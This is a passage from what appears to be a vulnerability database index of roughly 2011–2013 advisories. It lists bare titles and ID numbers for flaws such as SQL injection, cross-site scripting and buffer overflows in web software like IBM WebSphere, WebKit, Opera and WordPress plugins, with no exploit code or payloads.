Toolkit CVE-2012-5920 Cross Site Scripting Vulnerability [57534] Cisco WebEx Social CVE-2012-6397 Cross Site Scripting Vulnerability [57514] Perforce P4Web Multiple Cross Site Scripting Vulnerabilities [57513] IBM WebSphere Application Server CVE-2013-0462 Security Bypass Vulnerability [57512] IBM WebSphere Application Server CVE-2013-0459 Cross Site Scripting Vulnerability [57511] WebYaST CVE-2012-0435 Hosts List Modification Information Disclosure Vulnerability [57510] IBM WebSphere Application Server CVE-2013-0460 Cross-Site Request Forgery Vulnerability [57509] IBM WebSphere Application Server CVE-2013-0461 Cross Site Scripting Vulnerability [57508] IBM WebSphere Application Server CVE-2013-0458 Cross Site Scripting Vulnerability [57503] Adult Webmaster PHP Starter Script Password Disclosure Vulnerability [57498] myu-s and PHP WeblogSystem Unspecified Cross Site Scripting Vulnerability [57489] Cisco WebEx Training Center CVE-2013-1109 Cross Site Request Forgery Vulnerability [57488] Cisco WebEx Training Center CVE-2013-1110 Security Bypass Vulnerability [57487] Cisco WebEx Training Center CVE-2013-1108 Security Bypass Vulnerability [57452] Kent Web Access Report CVE-2012-5175 Cross-Site Scripting Vulnerability [57442] Drupal RESTful Web Services Module Cross Site Request Forgery Vulnerability [57434] Barracuda Web Application Firewall Unspecified HTML Injection Vulnerability [57313] MochiWeb CVE-2012-5641 Directory Traversal Vulnerability [57250] WeBid 'validate.php' Multiple SQL Injection Vulnerabilities [57227] Advantech WebAccess HMI/SCADA Unspecified Cross Site Scripting Vulnerability [57180] Website Baker Concert Calendar Add-on SQL Injection and Cross Site Scripting Vulnerabilities [57178] Advantech WebAccess HMI/SCADA HTML Injection Vulnerability [57143] PMSoftware Simple Web Server Directory Traversal Vulnerability [57132] Opera Web Browser CVE-2012-6467 Multiple Open Redirection Vulnerabilities [57125] Rugged Operating System Web UI Multiple Security Vulnerabilities [57121] Opera Web Browser Prior to 12.10 SSL Certificate Validation Security Weakness [57120] Opera Web Browser WebP Images Information Disclosure Vulnerability [57027] Webkit CVE-2011-3071 Remote Code Execution Vulnerability [57010] IBM WebSphere Application Server for z/OS Unspecified Arbitrary Command Execution Vulnerability [56996] Kiwi Syslog Web Access Multiple SQL Injection Vulnerabilities [56984] Opera Web Browser Repeated Attempts Site Access Address Bar URI Spoofing Vulnerability [56980] Opera Web Browser Prior to 12.12 Information Disclosure Vulnerability [56907] Citrix XenApp XML Service Interface CVE-2012-5161 Remote Code Execution Vulnerability [56906] Cerberus FTP Server Web Admin Multiple HTML-Injection Vulnerabilities [56871] Advantech Studio and Indusoft Web Studio 'NTWebServer.exe' Directory Traversal Vulnerability [56832] Kent Web Access Report CVE-2012-5176 Unspecified Cross-Site Scripting Vulnerability [56788] Opera Web Browser Memory Corruption Vulnerability [56774] Multiple Fortinet FortiWeb Appliances Multiple Cross Site Scripting Vulnerabilities [56763] OurWebFTP '/index.php' Multiple Cross Site Scripting Vulnerabilities [56758] IBM WebSphere Message Broker File System Insecure File Permissions Vulnerability [56720] Drupal Webmail Plus Module CVE-2012-5590 SQL Injection Vulnerability [56693] WebSite X5 Evolution 9 Cross Site Scripting and Security Bypass Vulnerabilities [56683] Beat Websites 'id' Parameter SQL Injection Vulnerability [56668] Websense Proxy Filter Security Bypass Vulnerability [56660] WordPress Webplayer Plugin 'id' Parameter SQL Injection Vulnerability [56659] WordPress Zingiri Web Shop Plugin 'path' Parameter Arbitrary File Upload Vulnerability [56617] IBM WebSphere DataPower XC10 Denial of Service and Security Bypass Vulnerabilities [56615] BIGACE Web CMS Session Fixation Vulnerability [56594] Opera Web Browser Buffer Overflow and Information Disclosure Vulnerabilities [56593] IBM WebSphere Portal Theme Component 'LayerLoader.jsp' Directory Traversal Vulnerability [56588] WeBid 'loader.php' Directory Traversal Vulnerability [56570] WebKit Cross Site Scripting Filter 'XSSAuditor.cpp' Security Bypass Vulnerability [56567] Media Player Classic WebServer Cross Site Scripting and Denial of Service Vulnerabilities [56536] Drupal RESTful Web Services Module Cross Site Request Forgery Vulnerability [56471] IBM WebSphere MQ Large Message Denial of Service Vulnerability [56460] IBM WebSphere Application Server CVE-2012-4850 Remote Privilege Escalation Vulnerability [56459] IBM WebSphere Application Server CVE-2012-3330 Denial Of Service Vulnerability [56458] IBM WebSphere Application Server CVE-2012-4853 Cross-Site Request Forgery Vulnerability [56451] Amazon Web Services SDK SSL Certificate Validation Security Bypass Vulnerability [56444] Drupal Webform CiviCRM Integration Module Access Bypass Vulnerability [56434] IcedTea-Web CVE-2012-4540 Heap Based Buffer Overflow Vulnerability [56423] IBM WebSphere Application Server 'Liberty Profile' Cross Site Scripting Vulnerability [56407] Opera Web Browser Prior to 12.10 Multiple Vulnerabilities [56396] Multiple IBM WebSphere Products Security Bypass Vulnerability [56387] Webmin 'real name' Field Cross Site Scripting Vulnerability [56362] WebKit CVE-2012-3748 Remote Code Execution Vulnerability [56349] Cisco Unified MeetingPlace Web Conferencing Buffer Overflow Vulnerability [56336] Google Web Toolkit Unspecified Cross Site Scripting Vulnerability [56314] libunity-webapps Use-After-Free Memory Corruption Vulnerability [56305] WordPress Easy Webinar Plugin 'wid' Parameter SQL Injection Vulnerability [56254] WebKit CVE-2012-3747 Unspecified Remote Code Execution Vulnerability [56245] IBM Tivoli Monitoring Web Server HTTP TRACE/TRACK Methods Information Disclosure Vulnerability [56167] libsocialweb CVE-2012-4511 Non-SSL Connection Man in The Middle Vulnerability [56001] Oracle WebCenter Sites CVE-2012-3184 Remote Security Vulnerability [55984] Oracle WebCenter Sites CVE-2012-3186 Remote Security Vulnerability [55980] Oracle WebCenter Sites CVE-2012-3185 Remote Security Vulnerability [55972] Oracle WebCenter Sites CVE-2012-3183 Remote Security Vulnerability [55968] Oracle WebCenter Sites CVE-2012-5065 Local Security Vulnerability [55946] LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability [55928] WebCalendar Multiple HTML Injection Vulnerabilities [55913] WebTitan Multiple SQL Injection and Command Injection Vulnerabilities [55904] WebTitan 'logs-x.php' Directory Traversal Vulnerability [55871] Drupal Basic webmail Module Cross Site Scripting and Information Disclosure Vulnerabilities [55866] Cisco WebEx WRF File Format Multiple Remote Memory Corruption Vulnerabilities [55843] HotScan Interface CVE-2012-2624 Buffer Overflow Vulnerability [55841] Siemens SIMATIC S7-1200 PLC 'web server' Component Cross Site Scripting Vulnerability [55831] SolarWinds Web Help Desk Multiple HTML Injection Vulnerabilities [55786] IBM WebSphere DataPower SOA Appliances XML Encryption Information Disclosure Vulnerability [55770] JBoss Web Services W3C XML Encryption Standard Information Disclosure Vulnerability [55769] IBM WebSphere Commerce User Data Information Disclosure Vulnerability [55761] PowerTCP WebServer for ActiveX CVE-2012-3819 Denial of Service Vulnerability [55703] Opera Web Browser Unspecified Denial of Service Vulnerability [55684] IBM WebSphere Commerce Enterprise REST Services Security Bypass Vulnerability [55683] IBM WebSphere Commerce Enterprise Remote Denial of Service Vulnerability [55678] IBM WebSphere Application Server for z/OS Multiple Security Vulnerabilities [55671] IBM WebSphere Application Server for z/OS Local Security Bypass Vulnerability [55670] IBM WebSphere MQ Remote Denial of Service Vulnerability [55648] Novell GroupWise HTTP Interfaces Directory Traversal Vulnerability [55631] WebKit for Apple iOS 6 for Developer Remote Information Disclosure Vulnerability [55593] osCommerce PayPal Website Payments Standard Module Security Bypass Vulnerability [55568] webERP 'WO' Parameter SQL Injection Vulnerability [55567] FreeWebshop Multiple SQL Injection and Cross Site Scripting Vulnerabilities [55534] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [55521] IBM WebSphere MQ .NET 'userid' and 'password' Information Disclosure Vulnerability [55512] Webify Photo Gallery Arbitrary File Deletion Vulnerability [55511] Webify Business Directory Arbitrary File Deletion Vulnerability [55510] Webify eDownloads Cart Arbitrary File Deletion Vulnerability [55496] Webify Blog Arbitrary File Deletion Vulnerability [55465] Honeywell HMIWeb Browser ActiveX Control Remote Buffer Overflow Vulnerability [55446] Webmin Multiple Input Validation Vulnerabilities [55426] web@all Local File Include and Multiple Arbitrary File Upload Vulnerabilities [55394] Barracuda Web Filter Authentification Module Multiple HTML Injection Vulnerabilities [55387] Wiki Web Help 'configpath' Parameter Remote File Include Vulnerability [55345] Opera Web Browser CVE-2012-4010 Address Bar URI Spoofing Vulnerability [55309] IBM WebSphere Application Server Administrative Access Security Bypass Vulnerability [55301] Opera Web Browser Prior to 12.02 Remote Code Execution Vulnerability [55259] Wordpress HD Webplayer Plugin Multiple SQL Injection Vulnerabilities [55257] Mozilla Firefox/Thunderbird Web Console CVE-2012-3980 Remote Code Execution Vulnerability [55251] Mono ASP.NET Web Form Hash Collision Denial Of Service Vulnerability [55229] Wiki Web Help Multiple HTML Injection Vulnerabilities [55220] Web Wiz Forums Multiple Cross-Site Scripting Vulnerabilities [55211] Wireshark Remote Interfaces Buffer Overflow Vulnerability [55207] PHP Web Scripts Easy Banner Pro 'page' Parameter Local File Include Vulnerability [55205] PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Include Vulnerability [55203] PHP Web Scripts Ad Manager Pro Multiple HTML Injection and SQL Injection Vulnerabilities [55201] WebPA Multiple Security Vulnerabilities [55194] Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities [55189] PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Include Vulnerability [55184] McAfee Email and Web Security Appliance and Email Gateway Multiple Vulnerabilities [55176] web@all Multiple Input Validation Vulnerabilities [55156] MediaSpan Website Management HTML Injection Vulnerability [55149] IBM WebSphere Application Server Administration Console Cross Site Scripting Vulnerability [55119] GREE Multiple Android Applications 'WebView' Class Information Disclosure Vulnerability [55107] Gwebmail Multiple Input Validation Vulnerabilities [55102] Hivemail Webmail Multiple HTML Injection Vulnerabilities [55098] Hupa Webmail 'href' Attribute Multiple HTML Injection Vulnerabilities [55097] WordPress Zingiri Web Shop Plugin 'index.php' Script Multiple SQL Injection Vulnerabilities [55083] T-dah Webmail Client Multiple HTML Injection Vulnerabilities [55080] WeBid 'getthumb.php' Remote File Disclosure Vulnerability [55077] WeBid Remote File Include and SQL Injection Vulnerabilities [55067] RoundCube Webmail Larry Skin HTML injection Vulnerability [55051] RoundCube Webmail 'href' Email Body HTML-injection Vulnerability [54983] IBM WebSphere MQ 'Web Gateway' Component Multiple Security Vulnerabilities [54893] T-dah Webmail Client HTML Injection Vulnerability [54892] Wespa Digital WespaJuris 'webshell.php' SQL Injection Vulnerabilities [54882] Inout Webmail Multiple HTML Injection Vulnerabilities [54845] Dir2web Multiple Security Vulnerabilities [54819] IBM WebSphere Application Server Unspecified Cross Site Scripting Vulnerability [54817] PolarisCMS 'WebForm_OnSubmit()' Function Cross Site Scripting Vulnerability [54812] Worksforweb iAuto Multiple Cross Site Scripting and HTML Injection Vulnerabilities [54788] Opera Web Browser Cross Site Scripting Sanitizer Security Bypass Vulnerability [54782] Opera Web Browser Prior to 12.01 Remote Code Execution Vulnerability [54780] Opera Web Browser Unspecified Security Vulnerability [54779] Opera Web Browser HTML Injection Vulnerability [54762] IcedTea-Web Multiple Arbitrary Code Execution Vulnerabilities [54735] Dr. Web Enterprise Security Suite 'username' Field HTML Injection Vulnerability [54721] Symantec Web Gateway 'deptUploads_data.php' SQL Injection Vulnerability [54703] WebKit SVG Images CVE-2012-3650 Uninitialized Memory Information Disclosure Vulnerability [54700] WebKit WebSockets CVE-2012-3696 HTTP Header Injection Vulnerability [54697] WebKit CVE-2012-3697 Sandbox Security Bypass Weakness [54696] WebKit Drag and Drop CVE-2012-3690 Cross-Origin Information Disclosure Vulnerability [54695] WebKit CVE-2012-3695 Cross-Site Scripting Vulnerability [54694] WebKit CVE-2012-3694 Information Disclosure Vulnerability [54693] WebKit International CVE-2012-3693 Domain Name URI Spoofing Vulnerability [54687] WebKit CVE-2012-3691 Cross Origin Information Disclosure Vulnerability [54686] WebKit CVE-2012-3689 Cross Origin Information Disclosure Vulnerability [54680] WebKit Multiple Unspecified Remote Code Execution Vulnerabilities [54664] IBM WebSphere MQ SVRCONN Channel Security Bypass Vulnerability [54618] Oxide WebServer Character Handling Denial Of Service Vulnerability [54609] OSIsoft PI OPC DA Interface Remote Stack Based Buffer Overflow Vulnerability [54605] PMSoftware Simple Web Server Remote Buffer Overflow Vulnerability [54592] Dr. Web Anti-Virus for Android Information Disclosure Vulnerability [54515] Oracle Sun Products Suite CVE-2012-1738 Remote Oracle iPlanet Web Server Vulnerability [54488] Yahoo! Browser for Android 'WebView' Class Information Disclosure Vulnerability [54466] web@all 'name' Parameter Cross Site Scripting Vulnerability [54463] WebsiteBaker 'lang' Cross Site Scripting Vulnerability [54442] WebPagetest Multiple Input Validation Vulnerabilities [54430] Symantec Web Gateway Password Change Security Bypass Vulnerability [54429] Symantec Web Gateway CVE-2012-2957 Local File Manipulation Authentication Bypass Vulnerability [54427] Symantec Web Gateway CVE-2012-2976 Code Injection Vulnerability [54426] Symantec Web Gateway CVE-2012-2953 Remote Shell Command Execution Vulnerability [54425] Symantec Web Gateway CVE-2012-2961 SQL Injection Vulnerability [54424] Symantec Web Gateway CVE-2012-2574 SQL Injection Vulnerability [54349] IBM WebSphere Portal Dojo Module Directory Traversal Vulnerability [54346] WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability [54336] Eclydre Web Manager 'upload.php' Arbitrary File Upload Vulnerability [54323] Kent Web YY-BOARD Unspecified Cross Site Scripting Vulnerability [54310] Webify Link Directory 'id' Parameter SQL Injection Vulnerability [54287] Webmatic 'Referer:' Field SQL Injection Vulnerability [54257] WordPress Zingiri Web Shop Plugin 'abspath' Parameter Remote File Include Vulnerability [54243] SpecView Web Server Directory Traversal Vulnerability [54236] webERP Multiple Remote and Local File Include Vulnerabilities [54213] Cisco WebEx WRF and ARF File Format Multiple Remote Buffer Overflow Vulnerabilities [54200] WordPress Website FAQ 'website-faq-widget.php' SQL Injection Vulnerability [54198] RoundCube Webmail CVE-2012-1253 Cross Site Scripting Vulnerability [54178] WEBO Software WEBO Site SpeedUp 'wss_lang' Parameter Local File Include Vulnerability [54109] web@all Cross Site Scripting and Cross Site Request Forgery Vulnerabilities [54068] Western Digital ShareSpace WEB GUI Information Disclosure Vulnerability [54051] IBM WebSphere Application Server 'iehs.war' Cross Site Scripting Vulnerability [54045] Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities [54035] Dolphin Browser HD for Android 'WebView' Class Information Disclosure Vulnerability [54020] WordPress Zingiri Web Shop Plugin 'uploadfilexd.php' Arbitrary File Upload Vulnerability [54019] TinyWebGallery CVE-2012-2932 Multiple Cross-Site Scripting Vulnerabilities [54011] Opera Web Browser Prior to 11.65 Multiple Vulnerabilities [53982] Quest Webthority Cross Site Request Forgery Vulnerability [53904] webSPELL Dailyinput Movie-Addon 'portal' Parameter SQL Injection Vulnerability [53902] HP Web Jetadmin Multiple Unspecified Cross Site Scripting Vulnerabilities [53890] webSPELL FIRSTBORN Movie-Addon 'id' Parameter SQL Injection Vulnerability [53859] IBM WebSphere Sensor Events Multiple Input Validation Vulnerabilities [53808] Multiple Browsers WebGL Implementation Linux NVIDIA Driver 'glBufferData()' Security Vulnerability [53783] @WEB ShoppingCart Unspecified Cross Site Scripting Vulnerability [53762] WebKit Cross Site Scripting Filter Security Bypass Vulnerability [53755] IBM WebSphere Application Snoop Servlets Information Disclosure Vulnerability [53749] Simple Web Content Management System Multiple SQL Injection Vulnerabilities [53715] Bloxx Web Filter Multiple Remote Security Vulnerabilities [53619] iLunascape for Android 'WebView' Class Information Disclosure Vulnerability [53612] Tornado 'tornado.web.RequestHandler.set_header()' HTTP Response Splitting Vulnerability [53600] Epicor Returns Management SOAP Interface SQL Injection Vulnerability [53565] 3DVIA Player WebPlayer ActiveX Control Multiple Buffer Overflow Vulnerabilities [53541] Kent WEB MART CVE-2012-1247 Cross Site Scripting Vulnerability [53539] Kent WEB MART Handling Cookies Cross Site Scripting Vulnerability [53474] Opera Web Browser Prior to 11.64 Remote Code Execution Vulnerability [53460] Kerio WinRoute Firewall Web Server Remote Source Code Disclosure Vulnerability [53453] Roundcube Webmail Information Disclosure Vulnerability [53446] WebKit CVE-2012-0676 Security Bypass Vulnerability [53444] Symantec Web Gateway Remote Shell Command Execution Vulnerability [53443] Symantec Web Gateway Management Scripts Arbitrary File Upload Vulnerability [53442] Symantec Web Gateway Arbitrary File Download And Delete Vulnerability [53435] Horde IMP Webmail Client Multiple Cross Site Scripting Vulnerabilities [53407] WebKit CVE-2011-3056 Cross Origin Information Disclosure Vulnerability [53404] WebKit CVE-2012-0672 Unspecified Memory Corruption Vulnerability [53396] Symantec Web Gateway 'l' Parameter Cross Site Scripting Vulnerability [53318] WordPress Zingiri Web Shop Plugin HTML Injection Vulnerabilities [53283] XPhone Unified Communications (UC) Web Multiple HTML Injection Vulnerabilities [53278] WordPress Zingiri Web Shop Plugin HTML Injection and Cross Site Scripting Vulnerabilities [53263] ACTi Web Configurator 'cgi-bin' Directory Traversal Vulnerability [53211] School Website Solutions Multiple Cross Site Scripting Vulnerabilities [53207] WebCalendar Local File Include and PHP code Injection Vulnerabilities [53194] RETIRED: IBM Tivoli Directory Server Web Admin Tool Unspecified Cross Site Scripting Vulnerability [53171] ReadyDesk Customer Interface Multiple HTML Injection Vulnerabilities [53148] WebKit Array.Splice Method Remote Code Execution Vulnerability [53133] Oracle Sun Products Suite CVE-2012-0516 Remote Oracle iPlanet Web Server Vulnerability [53118] Oracle GlassFish Enterprise Server 'REST interface' Cross Site Request Forgery Vulnerability [53082] Oracle WebCenter Forms Recognition 'CroScPlt.dll' ActiveX Control Insecure Method Vulnerability [53062] Oracle WebCenter Forms Recognition 'Sssplt30.ocx' ActiveX Control Remote Code Execution Vulnerabilty [53029] Fastpath WebChat Multiple Fields Multiple HTML Injection Vulnerabilities [53015] McAfee Web Gateway 'Host' HTTP Header Security Bypass Vulnerability [52981] Cisco IronPort Web Security Appliance Multiple Security Bypass Vulnerabilities [52956] WebKit SVG Tags CVE-2011-3928 Use-After-Free Remote Code Execution Vulnerability [52936] ISPConfig 'webdav_user_edit.php' Security Bypass Vulnerability [52882] Cisco WebEx WRF File Format Multiple Remote Buffer Overflow Vulnerabilities [52844] IBM Tivoli Directory Server Web Admin Tool Cross Site Scripting Vulnerability [52731] Opera Web Browser 11.62 prior Multiple Security Vulnerabilities [52727] FreePBX Recordings Interface Remote Code Execution Vulnerability [52724] IBM WebSphere Application Server 'SSLClientAuth' Security Bypass Vulnerability [52723] IBM WebSphere Application Server Virtual Member Manager Security Bypass Vulnerability [52722] IBM WebSphere Application Server Administration Console Cross Site Scripting Vulnerability [52721] IBM WebSphere Application Server Administration Console Cross Site Scripting Vulnerability [52651] WebGlimpse 'DOC' Parameter Directory Traversal Vulnerability [52647] WebGlimpse 'DOC' Parameter Cross Site Scripting Vulnerability [52646] WebGlimpse 'wgarcmin.cgi' Path Disclosure Vulnerability [52644] Webgrind 'file' Parameter Directory Traversal Vulnerability [52627] WebGlimpse 'webglimpse.cgi' Remote Command Injection Vulnerability [52571] Dell Webcam 'crazytalk4.ocx' ActiveX Multiple Buffer Overflow Vulnerabilities [52560] Dell Webcam Center 'CrazyTalk4Native.dll' ActiveX Multiple Buffer Overflow Vulnerabilities [52487] McAfee Email and Web Security Appliance and Email Gateway Multiple Vulnerabilities [52445] GoAhead WebServer HTTP Requests Denial Of Service Vulnerability [52423] WebKit Private Browsing 'Block cookies' Security Bypass Vulnerability [52421] WebKit HTTP Authentication Credentials Information Disclosure Vulnerability [52418] Aurora WebOPAC 'txtEmailAliasBarcode' Parameter SQL Injection Vulnerability [52367] WebKit Multiple Unspecified Cross Site Scripting Vulnerabilities [52365] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [52363] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [52348] Promise WebPAM Multiple Input Validation Vulnerabilities [52345] Drupal Webform Module Radio Buttons Checkboxes HTML Injection Vulnerability [52335] Webfolio CMS Multiple HTML Injection Vulnerabilities [52288] Blackberry WebKit Browser Engine Remote Code Execution Vulnerability [52250] IBM WebSphere Application Server for z/OS JAX-RPC Unspecified Remote Security Vulnerability [52220] Cisco Wireless LAN Controller CVE-2012-0370 'WebAuth' Denial of Service Vulnerability [52218] Webfolio CMS Cross Site Request Forgery Vulnerability [52189] Cookpad and Cookpad Noseru for Android 'WebView' Class Information Disclosure Vulnerability [52170] Webglimpse Multiple Cross Site Scripting Vulnerabilities [52119] WebcamXP and Webcam7 Directory Traversal Vulnerability [52116] Unity Web Player Heap Memory Corruption Vulnerability [52104] IBM WebSphere Lombardi Edition 'Coach' Script HTML Injection Vulnerability [52087] WebsiteBaker HTTP 'Referer' Header Cross Site Scripting Vulnerabilities [52068] webgrind 'dataFile' Parameter Cross Site Scripting Vulnerability [52064] SecureSphere Web Application Firewall Username HTML Injection Vulnerability [52051] Advantech WebAccess Multiple Remote Vulnerabilities [52050] Citrix XenServer Web Self Service Multiple Unspecified Vulnerabilities [51991] STHS v2 Web Portal 'team' parameter Multiple SQL Injection Vulnerabilities [51941] Advantech BroadWin WebAccess Remote Code Execution Vulnerability [51934] Microsoft SharePoint 'themeweb.aspx' Cross Site Scripting Vulnerability [51865] PHP-Fusion 'weblink_id' Parameter SQL Injection Vulnerability [51843] TYPO3 Webservices Extension Unspecified Remote Code Execution Vulnerability [51836] Siemens SIMATIC WinCC HMI Web Server Multiple Input Validation Vulnerabilities [51829] JBoss Web CVE-2011-4610 Remote Denial of Service Vulnerability [51820] SphinxSoftware Mobile Web Server Multiple HTML Injection Vulnerabilities [51762] FishEye and Crucible Webwork 2 Framework Remote Code Injection Vulnerability [51676] NX Web Companion Applet Handling Arbitrary Code Execution Vulnerability [51666] NeoAxis Web Player Zip File Directory Traversal Vulnerability [51648] Opera Web Browser Prior to 11.61 Information Disclosure and Security Bypass Vulnerabilities [51644] Stoneware webNetwork Cross Site Request Forgery and HTML Injection Vulnerabilities [51615] WordPress AllWebMenus Plugin 'actions.php' Arbitrary File Upload Vulnerability [51607] Savant Web Server Remote Buffer Overflow Vulnerability [51600] WebCalendar 'location' Variable Cross Site Scripting Vulnerability [51560] IBM WebSphere Application Server SibRaRecoverableSiXaResource Information Disclosure Vulnerability [51559] IBM WebSphere Application Server Prior to 6.1.0.41 Cross Site Scripting Vulnerability [51471] Oracle Web Services Manager CVE-2011-3531 Remote Oracle Web Services Manager Vulnerability [51469] Oracle Weblogic Server CVE-2011-3566 Remote Security Vulnerability [51463] Oracle Web Services Manager CVE-2011-3568 Remote Oracle Web Services Manager Vulnerability [51460] Oracle Fusion Middleware CVE-2012-0077 Remote Oracle WebLogic Server Vulnerability [51454] Oracle Fusion Middleware CVE-2012-0084 Remote Oracle WebCenter Content Vulnerability [51451] Oracle Fusion Middleware CVE-2012-0083 Remote Oracle WebCenter Content Vulnerability [51441] IBM WebSphere Application Server Hash Collision Denial Of Service Vulnerability [51435] WebTitan Appliance Multiple HTML Injection Vulnerabilities [51420] IBM WebSphere Application Server 'iscdeploy' Script Insecure File Permissions Vulnerability [51418] PHP Ringtone Website 'ringtones.php' Multiple Cross Site Scripting Vulnerabilities [51414] IBM WebSphere Application Server z/OS Cross Site Scripting and Unspecified Vulnerabilities [51345] IBM WebSphere Application Server Community Edition Tomcat Container Denial Of Service Vulnerability [51325] TinyWebGallery Multiple Remote Command Execution Vulnerabilities [51314] MangosWeb Enhanced 'Login' field SQL Injection Vulnerability [51313] Atmail Webmail Multiple HTML Injection Vulnerabilities [51303] Atmail Webmail Multiple HTML Injection Vulnerabilities [51246] IBM Web Experience Factory Smart Refresh HTML Injection Vulnerability [51210] Akiva WebBoard 'name' Parameter SQL Injection Vulnerability [51193] PHP Web Form Hash Collision Denial Of Service Vulnerability [51180] cApexWEB 'dfuserid' and 'dfpassword' Parameters Multiple SQL Injection Vulnerabilities [51109] WebSVN 'path' Parameter Multiple Cross Site Scripting Vulnerabilities [51088] Websense Triton 'favorites.exe' HTML Injection Vulnerability [51087] Multiple Websense Products 'favorites.exe' Authentication Bypass Vulnerability [51086] Websense Triton 'ws_irpt.exe' Remote Command Execution Vulnerability [51066] Opera Web Browser IFRAME Loading Information Disclosure Vulnerability [51054] WebKit 'getComputedStyle()' Information Disclosure Vulnerability [51050] WebKit CVE-2011-4692 Image Handling Information Disclosure Vulnerability [51044] Barracuda Web Filter Multiple HTML Injection Vulnerabilities [51035] WebKit 'font-face' Element Use-After-Free Remote Code Execution Vulnerability [51032] WebKit Style Sheet Elements CVE-2011-2341 Remote Code Execution Vulnerability [51027] Opera Web Browser Prior to 11.60 Multiple Denial of Service and Unspecified Vulnerabilitiies [51026] phpWebSite Unspecified Cross Site Scripting Vulnerability [50979] Linux Kernel CVE-2011-4087 Bridge Networking Interface Denial of Service Vulnerability [50916] Opera Web Browser Prior to 11.60 Unspecified Security Vulnerability [50915] Opera Web Browser 'in' Operator Cross Domain Information Disclosure Vulnerability [50914] Opera Web Browser Top Level Domains Cross Domain Scripting Vulnerability [50872] Drupal Webform Validation Module Multiple Cross Site Scripting Vulnerabilities [50845] Oxide WebServer Directory Traversal Vulnerability [50836] Schneider Electric Vijeo Historian Web Server Unspecified Directory Traversal Vulnerability [50834] Schneider Electric Vijeo Historian Web Server Cross Site Scripting Vulnerability [50827] MiniWeb Denial Of Service and Directory Traversal Vulnerabilities [50817] libsocialweb Non-SSL Connection Man in The Middle Vulnerability [50810] Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability [50734] Website Baker Backup Module Security Bypass Vulnerability [50729] GoAhead WebServer 'goform/formTest' Multiple Cross Site Scripting Vulnerabilities [50723] Jetty Web Server Directory Traversal Vulnerability [50713] webERP Information Disclosure, SQL Injection, and Cross Site Scripting Vulnerabilities [50694] FreeWebshop 'ajax_save_name.php' Remote Code Execution Vulnerability [50693] IBM WebSphere MQ Control Command Remote Security Bypass Vulnerability [50689] Webistry 'pid' Parameter SQL Injection Vulnerability [50679] Apple WebObjects Unspecified Cross Site Scripting Vulnerability [50677] InduSoft Web Studio 'CEServer' Component Stack-Based Buffer Overflow Vulnerability [50675] InduSoft Web Studio 'CEServer.exe' Remote Code Execution Vulnerability [50636] Drupal Webform CiviCRM Integration Module Unspecified SQL Injection Vulnerability [50610] IcedTea-Web Plugin CVE-2011-3377 Same Origin Policy Bypass Vulnerability [50508] Web File Browser 'webFileBrowser.php' Arbitrary File Download Vulnerability [50503] Serv-U Web Client Unspecified Cross Site Scripting Vulnerability [50473] GE Proficy Historian Web Administrator Cross Site Scripting Vulnerability [50466] IBM WebSphere MQ Disk Consumption Denial Of Service Vulnerability [50463] IBM WebSphere Application JavaServer Faces Functionality Information Disclosure Vulnerability [50461] IBM WebSphere MQ Group Names Local Security Bypass Vulnerability [50460] IBM WebSphere MQ CCDT File Local Privilege Escalation Vulnerability [50421] Opera Web Browser Escape Sequence Stack Buffer Overflow Denial of Service Vulnerability [50402] RoundCube Webmail Denial of Service Vulnerability [50373] Cisco WebEx WRF and ATAS32 File Format Multiple Remote Buffer Overflow Vulnerabilities [50368] IBM WebSphere ILOG Rule Team Server Unspecified Cross Site Scripting Vulnerability [50361] Retired: Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability [50341] McAfee Web Gateway Web Access Cross Site Scripting Vulnerability [50320] Opera Web Browser Tree Traversing Use-After-Free Memory Corruption Vulnerability [50313] Red Hat Linux Kernel Ethernet Bridge Interface Denial of Service Vulnerability [50310] IBM WebSphere Application Server LPTA Tokens Security Bypass Vulnerability [50298] Splunk Web component Remote Denial of Service Vulnerability [50212] Oracle Fusion Middleware CVE-2011-2237 Remote Oracle Web Services Manager Vulnerability [50210] Oracle Fusion Middleware CVE-2011-2318 Oracle WebLogic Server Local Vulnerability [50209] Oracle Fusion Middleware CVE-2011-3523 Remote Oracle Web Services Manager Vulnerability [50206] Oracle Fusion Middleware CVE-2011-2319 Remote Oracle WebLogic Server Vulnerability [50205] Oracle Fusion Middleware CVE-2011-2255 Remote Oracle WebLogic Portal Vulnerability [50198] Oracle Fusion Middleware CVE-2011-2320 Remote WebLogic Server Vulnerability [50180] WebKit Private Browsing Security Bypass Vulnerability [50175] phpMyAdmin Setup Interface Cross Site Scripting Vulnerability [50122] Apple Mac OS X QuickTime 'Save for Web' Feature HTML Injection Vulnerability [50088] WebKit Inactive DOM Windows Cross Domain Scripting Vulnerability [50066] WebKit Multiple Unspecifeid Remote Code Execution Vulnerabilities [50062] WebKit 'stale node' Remote Code Execution Vulnerability [50059] Kent Web Forum Unspecified HTML Injection Vulnerability [50057] Kent Web Forum Unspecified Cross Site Scripting Vulnerability [50056] IBM WebSphere ILOG Rule Team Server 'project' Parameter Cross Site Scripting Vulnerability [50048] Certec atvise webMI2ADS Web Server Multiple Remote Vulnerabilities [50044] Opera Web Browser SVG Layout Memory Corruption Vulnerability [50039] GoAhead WebServer Multiple HTML Injection Vulnerabilities [50035] Roundcube webmail '_user' Parameter SQL Injection Vulnerability [49929] Joomla! Google Website Optimizer Component HTML Injection Vulnerability [49917] QtWeb Browser Address Bar URI Spoofing Vulnerability [49874] WordPress Web Minimalist Theme 'index.php' Cross Site Scripting Vulnerability [49836] TYPO3 T3C Podcasts Web Functionality Inclusion Security Vulnerability [49779] Novell GroupWise Internet Agent HTTP Interface Stack Buffer Overflow Vulnerability [49773] Novell GroupWise 8 WebAccess 'Directory.Item' Parameters Cross-Site Scripting Vulnerabilities [49766] IBM WebSphere Application Server Cross-Site Request Forgery Vulnerability [49753] IceWarp Web Mail Multiple Information Disclosure Vulnerabilities [49690] WordPress Zingiri Web Shop Plugin 'wpabspath' Parameter Remote File Include Vulnerability [49685] WordPress AllWebMenus Plugin 'abspath' Parameter Remote File Include Vulnerability [49647] DivX Plus Web Player 'file://' URL Stack Buffer Overflow Vulnerability [49646] 